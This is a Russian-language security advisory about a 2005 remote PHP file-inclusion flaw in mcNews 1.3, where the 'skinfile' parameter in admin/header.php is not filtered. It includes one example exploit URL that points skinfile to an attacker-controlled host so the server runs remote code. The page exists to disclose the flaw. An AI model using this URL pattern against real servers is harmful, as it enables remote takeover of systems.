PHP-инклюдинг в mcNews

Дата публикации:
09.03.2005
Всего просмотров:
1141
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-0720
CVE-2005-0800
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
mcNews 1.x
Уязвимые версии: mcNews 1.3

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе.

Уязвимость существует в сценарии 'mcNews/admin/header.php' из-за недостаточной фильтрации входных данных в переменной skinfile. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный php сценарий на уязвимой системе. Пример:

http://[target]/[dir]/mcNews/admin/header.php?skinfile=http://[attacker]/

URL производителя: http://www.phpforums.net/index.php?dir=dld

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: mcNews 'header.php' Include File Flaw Lets Remote Users Execute Arbitrary Commands

или введите имя

CAPTCHA